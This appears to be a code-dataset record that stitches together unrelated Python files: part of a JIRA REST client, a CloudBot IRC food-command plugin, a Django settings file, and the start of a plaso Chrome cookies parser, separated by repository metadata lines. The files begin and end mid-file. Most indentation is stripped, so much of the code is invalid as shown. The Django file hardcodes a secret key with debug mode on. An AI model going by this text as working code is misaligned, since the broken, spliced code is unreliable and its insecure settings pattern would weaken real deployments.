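    #
    #   jira.create_project('DEMO', name='Demo Project')
    #
    # The project key and name are assumptions for the example; the key must be
    # 2-10 uppercase letters, as checked above.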
def add_user(self, username, email, directoryId=1, password=None,
fullname=None, notify=False, active=True):
'''
Creates a new JIRA user
:param username: the username of the new user
:type username: ``str``
:param email: email address of the new user
:type email: ``str``
:param directoryId: the directory ID the new user should be a part of
:type directoryId: ``int``
:param password: Optional, the password for the new user
:type password: ``str``
:param fullname: Optional, the full name of the new user
:type fullname: ``str``
:param notify: Whether or not to send a notification to the new user
        :type notify: ``bool``
:param active: Whether or not to make the new user active upon creation
:type active: ``bool``
:return:
'''
if not fullname:
fullname = username
# TODO: default the directoryID to the first directory in jira instead
# of 1 which is the internal one.
url = self._options['server'] + '/rest/api/latest/user'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['displayName'] = fullname
x['emailAddress'] = email
x['name'] = username
if password:
x['password'] = password
if notify:
x['notification'] = 'True'
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
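    # Usage sketch (illustrative only): assuming admin rights, creating a new
    # account could look like:
    #
    #   jira.add_user('jdoe', '[email protected]',
    #                 fullname='Jane Doe', password='changeme', notify=True)
    #
    # The username, email address and password are assumptions for the example.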
def add_user_to_group(self, username, group):
'''
Adds a user to an existing group.
:param username: Username that will be added to specified group.
:param group: Group that the user will be added to.
:return: Boolean, True for success, false for failure.
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': group}
y = {'name': username}
payload = json.dumps(y)
self._session.post(url, params=x, data=payload)
return True
def remove_user_from_group(self, username, groupname):
'''
Removes a user from a group.
:param username: The user to remove from the group.
:param groupname: The group that the user will be removed from.
:return:
'''
url = self._options['server'] + '/rest/api/latest/group/user'
x = {'groupname': groupname,
'username': username}
self._session.delete(url, params=x)
return True
# Experimental
# Experimental support for iDalko Grid, expect API to change as it's using private APIs currently
# https://support.idalko.com/browse/IGRID-1017
def get_igrid(self, issueid, customfield, schemeid):
url = self._options['server'] + '/rest/idalko-igrid/1.0/datagrid/data'
if str(customfield).isdigit():
customfield = "customfield_%s" % customfield
params = {
#'_mode':'view',
'_issueId': issueid,
'_fieldId': customfield,
'_confSchemeId': schemeid,
#'validate':True,
#'_search':False,
#'rows':100,
#'page':1,
#'sidx':'DEFAULT',
#'sord':'asc',
}
r = self._session.get(
url, headers=self._options['headers'], params=params)
return json_loads(r)
# Jira Agile specific methods (GreenHopper)
"""
Define the functions that interact with GreenHopper.
"""
@translate_resource_args
def boards(self):
"""
Get a list of board GreenHopperResources.
"""
r_json = self._get_json(
'rapidviews/list', base=self.AGILE_BASE_URL)
boards = [Board(self._options, self._session, raw_boards_json)
for raw_boards_json in r_json['views']]
return boards
@translate_resource_args
def sprints(self, id, extended=False):
"""
Get a list of sprint GreenHopperResources.
:param id: the board to get sprints from
:param extended: fetch additional information like startDate, endDate, completeDate,
            much slower because it requires an additional request for each sprint
        :rtype: a list of Sprint resources; the raw data of each sprint looks like:
>>> { "id": 893,
>>> "name": "iteration.5",
>>> "state": "FUTURE",
>>> "linkedPagesCount": 0,
>>> "startDate": "None",
>>> "endDate": "None",
>>> "completeDate": "None",
>>> "remoteLinks": []
>>> }
"""
r_json = self._get_json('sprintquery/%s?includeHistoricSprints=true&includeFutureSprints=true' % id,
base=self.AGILE_BASE_URL)
if extended:
sprints = []
for raw_sprints_json in r_json['sprints']:
r_json = self._get_json(
'sprint/%s/edit/model' % raw_sprints_json['id'], base=self.AGILE_BASE_URL)
sprints.append(
Sprint(self._options, self._session, r_json['sprint']))
else:
sprints = [Sprint(self._options, self._session, raw_sprints_json)
for raw_sprints_json in r_json['sprints']]
return sprints
def sprints_by_name(self, id, extended=False):
sprints = {}
for s in self.sprints(id, extended=extended):
if s.name not in sprints:
sprints[s.name] = s.raw
else:
raise (Exception(
"Fatal error, duplicate Sprint Name (%s) found on board %s." % (s.name, id)))
return sprints
def update_sprint(self, id, name=None, startDate=None, endDate=None, state=None):
payload = {}
if name:
payload['name'] = name
if startDate:
payload['startDate'] = startDate
if endDate:
            payload['endDate'] = endDate
if state:
payload['state'] = state
url = self._get_url('sprint/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
return json_loads(r)
def completed_issues(self, board_id, sprint_id):
"""
Return the completed issues for ``board_id`` and ``sprint_id``.
        :param board_id: the board to retrieve issues from
        :param sprint_id: the sprint to retrieve issues from
"""
# TODO need a better way to provide all the info from the sprintreport
        # incompletedIssues went to the backlog but were not completed
# issueKeysAddedDuringSprint used to mark some with a * ?
# puntedIssues are for scope change?
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['completedIssues']]
return issues
def completedIssuesEstimateSum(self, board_id, sprint_id):
"""
Return the total completed points this sprint.
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['contents']['completedIssuesEstimateSum']['value']
def incompleted_issues(self, board_id, sprint_id):
"""
        Return the incomplete issues for the sprint.
"""
r_json = self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)
issues = [Issue(self._options, self._session, raw_issues_json) for raw_issues_json in
r_json['contents']['incompletedIssues']]
return issues
def sprint_info(self, board_id, sprint_id):
"""
Return the information about a sprint.
        :param board_id: the board the sprint belongs to
        :param sprint_id: the sprint to retrieve information for
"""
return self._get_json('rapid/charts/sprintreport?rapidViewId=%s&sprintId=%s' % (board_id, sprint_id),
base=self.AGILE_BASE_URL)['sprint']
# TODO: remove this as we do have Board.delete()
def delete_board(self, id):
"""
Deletes an agile board.
        :param id: ID of the board to delete
"""
payload = {}
url = self._get_url(
'rapidview/%s' % id, base=self.AGILE_BASE_URL)
r = self._session.delete(
url, data=json.dumps(payload))
def create_board(self, name, project_ids, preset="scrum"):
"""
Create a new board for the ``project_ids``.
:param name: name of the board
:param project_ids: the projects to create the board in
:param preset: what preset to use for this board
:type preset: 'kanban', 'scrum', 'diy'
"""
payload = {}
if isinstance(project_ids, string_types):
ids = []
for p in project_ids.split(','):
ids.append(self.project(p).id)
project_ids = ','.join(ids)
payload['name'] = name
if isinstance(project_ids, string_types):
project_ids = project_ids.split(',')
payload['projectIds'] = project_ids
payload['preset'] = preset
url = self._get_url(
'rapidview/create/presets', base=self.AGILE_BASE_URL)
r = self._session.post(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Board(self._options, self._session, raw=raw_issue_json)
def create_sprint(self, name, board_id, startDate=None, endDate=None):
"""
Create a new sprint for the ``board_id``.
:param name: name of the sprint
:param board_id: the board to add the sprint to
"""
url = self._get_url(
'sprint/%s' % board_id, base=self.AGILE_BASE_URL)
r = self._session.post(
url)
raw_issue_json = json_loads(r)
""" now r contains something like:
{
"id": 742,
"name": "Sprint 89",
"state": "FUTURE",
"linkedPagesCount": 0,
"startDate": "None",
"endDate": "None",
"completeDate": "None",
"remoteLinks": []
}"""
payload = {'name': name}
if startDate:
payload["startDate"] = startDate
if endDate:
payload["endDate"] = endDate
url = self._get_url(
'sprint/%s' % raw_issue_json['id'], base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Sprint(self._options, self._session, raw=raw_issue_json)
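    # Usage sketch (illustrative only): assuming a project 'TEST' already exists,
    # creating a scrum board for it and a sprint on that board could look like:
    #
    #   board = jira.create_board('TEST board', 'TEST', preset='scrum')
    #   sprint = jira.create_sprint('Sprint 1', board.id)
    #
    # The project key and names are assumptions for the example.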
# TODO: broken, this API does not exist anymore and we need to use
    # issue.update() to perform this operation
# Workaround based on https://answers.atlassian.com/questions/277651/jira-agile-rest-api-example
def add_issues_to_sprint(self, sprint_id, issue_keys):
"""
Add the issues in ``issue_keys`` to the ``sprint_id``. The sprint must
be started but not completed.
        If a sprint was completed, you then have to also edit the history of the
issue so that it was added to the sprint before it was completed,
preferably before it started. A completed sprint's issues also all have
a resolution set before the completion date.
        If a sprint was not started, you then have to edit the marker and copy the
rank of each issue too.
:param sprint_id: the sprint to add issues to
:param issue_keys: the issues to add to the sprint
"""
# Get the customFieldId for "Sprint"
sprint_field_name = "Sprint"
sprint_field_id = [f['schema']['customId'] for f in self.fields()
if f['name'] == sprint_field_name][0]
data = {}
data['idOrKeys'] = issue_keys
data['customFieldId'] = sprint_field_id
data['sprintId'] = sprint_id
data['addToBacklog'] = False
url = self._get_url('sprint/rank', base=self.AGILE_BASE_URL)
r = self._session.put(url, data=json.dumps(data))
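    # Usage sketch (illustrative only): assuming a started sprint with id 742 and
    # two existing issues, adding them could look like:
    #
    #   jira.add_issues_to_sprint(742, ['TEST-1', 'TEST-2'])
    #
    # The sprint id and issue keys are assumptions for the example.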
def add_issues_to_epic(self, epic_id, issue_keys, ignore_epics=True):
"""
Add the issues in ``issue_keys`` to the ``epic_id``.
:param epic_id: the epic to add issues to
:param issue_keys: the issues to add to the epic
:param ignore_epics: ignore any issues listed in ``issue_keys`` that are epics
"""
data = {}
data['issueKeys'] = issue_keys
data['ignoreEpics'] = ignore_epics
url = self._get_url('epics/%s/add' %
epic_id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
def rank(self, issue, next_issue):
"""
Rank an issue before another using the default Ranking field, the one named 'Rank'.
:param issue: issue key of the issue to be ranked before the second one.
:param next_issue: issue key of the second issue.
"""
# {"issueKeys":["ANERDS-102"],"rankBeforeKey":"ANERDS-94","rankAfterKey":"ANERDS-7","customFieldId":11431}
if not self._rank:
for field in self.fields():
if field['name'] == 'Rank':
if field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-lexo-rank":
self._rank = field['schema']['customId']
break
elif field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-global-rank":
# Obsolete since JIRA v6.3.13.1
self._rank = field['schema']['customId']
data = {
"issueKeys": [issue], "rankBeforeKey": next_issue, "customFieldId": self._rank}
url = self._get_url('rank', base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
class GreenHopper(JIRA):
def __init__(self, options=None, basic_auth=None, oauth=None, async=None):
warnings.warn(
"GreenHopper() class is deprecated, just use JIRA() instead.", DeprecationWarning)
JIRA.__init__(
self, options=options, basic_auth=basic_auth, oauth=oauth, async=async)
| bsd-2-clause | -7,322,391,625,200,059,000 | 38.108742 | 243 | 0.592792 | false |
sbeparey/CloudBot | plugins/foods.py | 1 | 14374 | import codecs
import json
import os
import random
import asyncio
import re
from cloudbot import hook
from cloudbot.util import textgen
nick_re = re.compile(r"^[A-Za-z0-9_|.\-\]\[\{\}]*$", re.I)
cakes = ['Chocolate', 'Ice Cream', 'Angel', 'Boston Cream', 'Birthday', 'Bundt', 'Carrot', 'Coffee', 'Devils', 'Fruit',
'Gingerbread', 'Pound', 'Red Velvet', 'Stack', 'Welsh', 'Yokan']
cookies = ['Chocolate Chip', 'Oatmeal', 'Sugar', 'Oatmeal Raisin', 'Macadamia Nut', 'Jam Thumbprint', 'Mexican Wedding',
'Biscotti', 'Oatmeal Cranberry', 'Chocolate Fudge', 'Peanut Butter', 'Pumpkin', 'Lemon Bar',
'Chocolate Oatmeal Fudge', 'Toffee Peanut', 'Danish Sugar', 'Triple Chocolate', 'Oreo']
# <Luke> Hey guys, any good ideas for plugins?
# <User> I don't know, something that lists every potato known to man?
# <Luke> BRILLIANT
potatoes = ['AC Belmont', 'AC Blue Pride', 'AC Brador', 'AC Chaleur', 'AC Domino', 'AC Dubuc', 'AC Glacier Chip',
'AC Maple Gold', 'AC Novachip', 'AC Peregrine Red', 'AC Ptarmigan', 'AC Red Island', 'AC Saguenor',
'AC Stampede Russet', 'AC Sunbury', 'Abeille', 'Abnaki', 'Acadia', 'Acadia Russet', 'Accent',
'Adirondack Blue', 'Adirondack Red', 'Adora', 'Agria', 'All Blue', 'All Red', 'Alpha', 'Alta Russet',
'Alturas Russet', 'Amandine', 'Amisk', 'Andover', 'Anoka', 'Anson', 'Aquilon', 'Arran Consul', 'Asterix',
'Atlantic', 'Austrian Crescent', 'Avalanche', 'Banana', 'Bannock Russet', 'Batoche', 'BeRus',
'Belle De Fonteney', 'Belleisle', 'Bintje', 'Blossom', 'Blue Christie', 'Blue Mac', 'Brigus',
'Brise du Nord', 'Butte', 'Butterfinger', 'Caesar', 'CalWhite', 'CalRed', 'Caribe', 'Carlingford',
'Carlton', 'Carola', 'Cascade', 'Castile', 'Centennial Russet', 'Century Russet', 'Charlotte', 'Cherie',
'Cherokee', 'Cherry Red', 'Chieftain', 'Chipeta', 'Coastal Russet', 'Colorado Rose', 'Concurrent',
'Conestoga', 'Cowhorn', 'Crestone Russet', 'Crispin', 'Cupids', 'Daisy Gold', 'Dakota Pearl', 'Defender',
'Delikat', 'Denali', 'Desiree', 'Divina', 'Dundrod', 'Durango Red', 'Early Rose', 'Elba', 'Envol',
'Epicure', 'Eramosa', 'Estima', 'Eva', 'Fabula', 'Fambo', 'Fremont Russet', 'French Fingerling',
'Frontier Russet', 'Fundy', 'Garnet Chile', 'Gem Russet', 'GemStar Russet', 'Gemchip', 'German Butterball',
'Gigant', 'Goldrush', 'Granola', 'Green Mountain', 'Haida', 'Hertha', 'Hilite Russet', 'Huckleberry',
'Hunter', 'Huron', 'IdaRose', 'Innovator', 'Irish Cobbler', 'Island Sunshine', 'Ivory Crisp',
'Jacqueline Lee', 'Jemseg', 'Kanona', 'Katahdin', 'Kennebec', "Kerr's Pink", 'Keswick', 'Keuka Gold',
'Keystone Russet', 'King Edward VII', 'Kipfel', 'Klamath Russet', 'Krantz', 'LaRatte', 'Lady Rosetta',
'Latona', 'Lemhi Russet', 'Liberator', 'Lili', 'MaineChip', 'Marfona', 'Maris Bard', 'Maris Piper',
'Matilda', 'Mazama', 'McIntyre', 'Michigan Purple', 'Millenium Russet', 'Mirton Pearl', 'Modoc', 'Mondial',
'Monona', 'Morene', 'Morning Gold', 'Mouraska', 'Navan', 'Nicola', 'Nipigon', 'Niska', 'Nooksack',
'NorValley', 'Norchip', 'Nordonna', 'Norgold Russet', 'Norking Russet', 'Norland', 'Norwis', 'Obelix',
'Ozette', 'Peanut', 'Penta', 'Peribonka', 'Peruvian Purple', 'Pike', 'Pink Pearl', 'Prospect', 'Pungo',
'Purple Majesty', 'Purple Viking', 'Ranger Russet', 'Reba', 'Red Cloud', 'Red Gold', 'Red La Soda',
'Red Pontiac', 'Red Ruby', 'Red Thumb', 'Redsen', 'Rocket', 'Rose Finn Apple', 'Rose Gold', 'Roselys',
'Rote Erstling', 'Ruby Crescent', 'Russet Burbank', 'Russet Legend', 'Russet Norkotah', 'Russet Nugget',
'Russian Banana', 'Saginaw Gold', 'Sangre', 'Satina', 'Saxon', 'Sebago', 'Shepody', 'Sierra',
'Silverton Russet', 'Simcoe', 'Snowden', 'Spunta', "St. John's", 'Summit Russet', 'Sunrise', 'Superior',
'Symfonia', 'Tolaas', 'Trent', 'True Blue', 'Ulla', 'Umatilla Russet', 'Valisa', 'Van Gogh', 'Viking',
'Wallowa Russet', 'Warba', 'Western Russet', 'White Rose', 'Willamette', 'Winema', 'Yellow Finn',
'Yukon Gold']
def is_valid(target):
""" Checks if a string is a valid IRC nick. """
if nick_re.match(target):
return True
else:
return False
@hook.on_start()
def load_foods(bot):
"""
:type bot: cloudbot.bot.CloudBot
"""
global sandwich_data, taco_data, coffee_data, noodles_data, muffin_data, \
tea_data, keto_data, beer_data, cheese_data, pancake_data, chicken_data, \
icecream_data, brekkie_data, doobie_data
with codecs.open(os.path.join(bot.data_dir, "sandwich.json"), encoding="utf-8") as f:
sandwich_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "taco.json"), encoding="utf-8") as f:
taco_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "coffee.json"), encoding="utf-8") as f:
coffee_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "noodles.json"), encoding="utf-8") as f:
noodles_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "muffin.json"), encoding="utf-8") as f:
muffin_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "tea.json"), encoding="utf-8") as f:
tea_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "keto.json"), encoding="utf-8") as f:
keto_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "cheese.json"), encoding="utf-8") as f:
cheese_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "pancake.json"), encoding="utf-8") as f:
pancake_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "chicken.json"), encoding="utf-8") as f:
chicken_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "brekkie.json"), encoding="utf-8") as f:
brekkie_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "icecream.json"), encoding="utf-8") as f:
icecream_data = json.load(f)
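# Each JSON file above is expected to provide at least a "templates" list and a
# "parts" mapping, which textgen.TextGenerator combines with the {user} variable.
# A minimal, hypothetical sandwich.json could look like this (the actual data
# files shipped with the bot may differ):
#
#   {
#       "templates": ["makes {user} a {flavor} {filling} sandwich!"],
#       "parts": {
#           "flavor": ["tasty", "delicious"],
#           "filling": ["ham", "turkey"]
#       }
#   }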
@asyncio.coroutine
@hook.command
def potato(text, action):
"""<user> - makes <user> a tasty little potato"""
user = text.strip()
if not is_valid(user):
return "I can't give a potato to that user."
potato_type = random.choice(potatoes)
size = random.choice(['small', 'little', 'mid-sized', 'medium-sized', 'large', 'gigantic'])
flavor = random.choice(['tasty', 'delectable', 'delicious', 'yummy', 'toothsome', 'scrumptious', 'luscious'])
method = random.choice(['bakes', 'fries', 'boils', 'roasts'])
side_dish = random.choice(['side salad', 'dollop of sour cream', 'piece of chicken', 'bowl of shredded bacon'])
action("{} a {} {} {} potato for {} and serves it with a small {}!".format(method, flavor, size, potato_type, user,
side_dish))
@asyncio.coroutine
@hook.command
def cake(text, action):
"""<user> - gives <user> an awesome cake"""
user = text.strip()
if not is_valid(user):
return "I can't give a cake to that user."
cake_type = random.choice(cakes)
size = random.choice(['small', 'little', 'mid-sized', 'medium-sized', 'large', 'gigantic'])
flavor = random.choice(['tasty', 'delectable', 'delicious', 'yummy', 'toothsome', 'scrumptious', 'luscious'])
method = random.choice(['makes', 'gives', 'gets', 'buys'])
side_dish = random.choice(['glass of chocolate milk', 'bowl of ice cream', 'jar of cookies',
'side of chocolate sauce'])
action("{} {} a {} {} {} cake and serves it with a small {}!".format(method, user, flavor, size, cake_type,
side_dish))
@asyncio.coroutine
@hook.command
def cookie(text, action):
"""<user> - gives <user> a cookie"""
user = text.strip()
if not is_valid(user):
return "I can't give a cookie to that user."
cookie_type = random.choice(cookies)
size = random.choice(['small', 'little', 'medium-sized', 'large', 'gigantic'])
flavor = random.choice(['tasty', 'delectable', 'delicious', 'yummy', 'toothsome', 'scrumptious', 'luscious'])
method = random.choice(['makes', 'gives', 'gets', 'buys'])
side_dish = random.choice(['glass of milk', 'bowl of ice cream', 'bowl of chocolate sauce'])
action("{} {} a {} {} {} cookie and serves it with a {}!".format(method, user, flavor, size, cookie_type,
side_dish))
@asyncio.coroutine
@hook.command
def sandwich(text, action):
"""<user> - give a tasty sandwich to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give a sandwich to that user."
generator = textgen.TextGenerator(sandwich_data["templates"], sandwich_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def taco(text, action):
"""<user> - give a taco to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give a taco to that user."
generator = textgen.TextGenerator(taco_data["templates"], taco_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def drink(text, action):
"""<user> - give a drink to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give drinks to that user."
r = random.randint(1,2)
if r == 1:
generator = textgen.TextGenerator(coffee_data["templates"], coffee_data["parts"],
variables={"user": user})
else:
generator = textgen.TextGenerator(tea_data["templates"], tea_data["parts"],
variables={"user": user})
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def coffee(text, action):
"""<user> - give coffee to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give coffee to that user."
generator = textgen.TextGenerator(coffee_data["templates"], coffee_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def noodles(text, action):
"""<user> - give noodles to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give noodles to that user."
generator = textgen.TextGenerator(noodles_data["templates"], noodles_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def muffin(text, action):
"""<user> - give muffin to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give muffin to that user."
generator = textgen.TextGenerator(muffin_data["templates"], muffin_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def tea(text, action):
"""<user> - give tea to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give tea to that user."
generator = textgen.TextGenerator(tea_data["templates"], tea_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def keto(text, action):
"""<user> - give keto food to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give food to that user."
generator = textgen.TextGenerator(keto_data["templates"], keto_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def cheese(text, action):
"""<user> - give cheese to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give cheese to that user."
generator = textgen.TextGenerator(cheese_data["templates"], cheese_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def pancake(text, action):
"""<user> - give pancakes to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give pancakes to that user."
generator = textgen.TextGenerator(pancake_data["templates"], pancake_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def chicken(text, action):
"""<user> - give pancakes to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give pancakes to that user."
generator = textgen.TextGenerator(chicken_data["templates"], chicken_data["parts"], variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def icecream(text, action):
"""<user> - give icecream to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give icecream to that user."
generator = textgen.TextGenerator(icecream_data["templates"], icecream_data["parts"], variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command("brekky", "brekkie")
def brekkie(text, action):
"""<user> - give brekkie to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give brekkie to that user."
generator = textgen.TextGenerator(brekkie_data["templates"], brekkie_data["parts"], variables={"user": user})
# act out the message
action(generator.generate_string()) | gpl-3.0 | -8,647,342,310,235,884,000 | 39.379213 | 120 | 0.599416 | false |
berlotto/bolao-futebol | bolao/settings.py | 1 | 2001 | """
Django settings for bolao project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5zhqg$4=*=24(7u(mj^-hn-#eg!k21i75&j9kg)*xz4*8$(_)s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'apostas',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'bolao.urls'
WSGI_APPLICATION = 'bolao.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = False
USE_L10N = False
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
| lgpl-3.0 | -7,687,704,100,187,002,000 | 23.108434 | 71 | 0.718141 | false |
Onager/plaso | plaso/parsers/sqlite_plugins/chrome_cookies.py | 1 | 8029 | # -*- coding: utf-8 -*-
"""SQLite parser plugin for Google Chrome cookies database files."""
from dfdatetime import webkit_time as dfdatetime_webkit_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
# Register the cookie plugins.
from plaso.parsers import cookie_plugins # pylint: disable=unused-import
from plaso.parsers import sqlite
from plaso.parsers.cookie_plugins import manager as cookie_plugins_manager
from plaso.parsers.sqlite_plugins import interface
class ChromeCookieEventData(events.EventData):
"""Chrome Cookie event data.
Attributes:
cookie_name (str): name of the cookie.
host (str): hostname of host that set the cookie value.
httponly (bool): True if the cookie cannot be accessed through client
side script.
path (str): path where the cookie got set.
persistent (bool): True if the cookie is persistent.
secure (bool): True if the cookie should only be transmitted over a
secure channel.
url (str): URL or path where the cookie got set.
data (str): value of the cookie.
"""
DATA_TYPE = 'chrome:cookie:entry'
def __init__(self):
"""Initializes event data."""
super(ChromeCookieEventData, self).__init__(data_type=self.DATA_TYPE)
self.cookie_name = None
self.data = None
self.host = None
self.httponly = None
self.path = None
self.persistent = None
self.secure = None
self.url = None
class BaseChromeCookiePlugin(interface.SQLitePlugin):
"""SQLite parser plugin for Google Chrome cookies database files."""
# Point to few sources for URL information.
URLS = [
'http://src.chromium.org/svn/trunk/src/net/cookies/',
('http://www.dfinews.com/articles/2012/02/'
'google-analytics-cookies-and-forensic-implications')]
# Google Analytics __utmz variable translation.
# Taken from:
# http://www.dfinews.com/sites/dfinews.com/files/u739/Tab2Cookies020312.jpg
GA_UTMZ_TRANSLATION = {
'utmcsr': 'Last source used to access.',
'utmccn': 'Ad campaign information.',
'utmcmd': 'Last type of visit.',
'utmctr': 'Keywords used to find site.',
'utmcct': 'Path to the page of referring link.'}
def __init__(self):
"""Initializes a plugin."""
super(BaseChromeCookiePlugin, self).__init__()
self._cookie_plugins = (
cookie_plugins_manager.CookiePluginsManager.GetPlugins())
def ParseCookieRow(self, parser_mediator, query, row, **unused_kwargs):
"""Parses a cookie row.
Args:
parser_mediator (ParserMediator): parser mediator.
query (str): query that created the row.
row (sqlite3.Row): row resulting from the query.
"""
query_hash = hash(query)
cookie_name = self._GetRowValue(query_hash, row, 'name')
cookie_data = self._GetRowValue(query_hash, row, 'value')
hostname = self._GetRowValue(query_hash, row, 'host_key')
if hostname.startswith('.'):
hostname = hostname[1:]
httponly = self._GetRowValue(query_hash, row, 'httponly')
path = self._GetRowValue(query_hash, row, 'path')
persistent = self._GetRowValue(query_hash, row, 'persistent')
secure = self._GetRowValue(query_hash, row, 'secure')
if secure:
scheme = 'https'
else:
scheme = 'http'
url = '{0:s}://{1:s}{2:s}'.format(scheme, hostname, path)
event_data = ChromeCookieEventData()
event_data.cookie_name = cookie_name
event_data.data = cookie_data
event_data.host = hostname
event_data.httponly = bool(httponly)
event_data.path = path
event_data.persistent = bool(persistent)
event_data.query = query
event_data.secure = bool(secure)
event_data.url = url
timestamp = self._GetRowValue(query_hash, row, 'creation_utc')
date_time = dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_CREATION)
parser_mediator.ProduceEventWithEventData(event, event_data)
timestamp = self._GetRowValue(query_hash, row, 'last_access_utc')
date_time = dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_ACCESS)
parser_mediator.ProduceEventWithEventData(event, event_data)
timestamp = self._GetRowValue(query_hash, row, 'expires_utc')
if timestamp:
date_time = dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_EXPIRATION)
parser_mediator.ProduceEventWithEventData(event, event_data)
for plugin in self._cookie_plugins:
if cookie_name != plugin.COOKIE_NAME:
continue
try:
plugin.UpdateChainAndProcess(
parser_mediator, cookie_data=cookie_data, cookie_name=cookie_name,
url=url)
except Exception as exception: # pylint: disable=broad-except
parser_mediator.ProduceExtractionWarning(
'plugin: {0:s} unable to parse cookie with error: {1!s}'.format(
plugin.NAME, exception))
class Chrome17CookiePlugin(BaseChromeCookiePlugin):
"""SQLite parser plugin for Google Chrome 17 - 65 cookies database files."""
NAME = 'chrome_17_cookies'
DATA_FORMAT = 'Google Chrome 17 - 65 cookies SQLite database file'
REQUIRED_STRUCTURE = {
'cookies': frozenset([
'creation_utc', 'host_key', 'name', 'value', 'path', 'expires_utc',
'secure', 'httponly', 'last_access_utc', 'has_expires',
'persistent']),
'meta': frozenset([])}
QUERIES = [
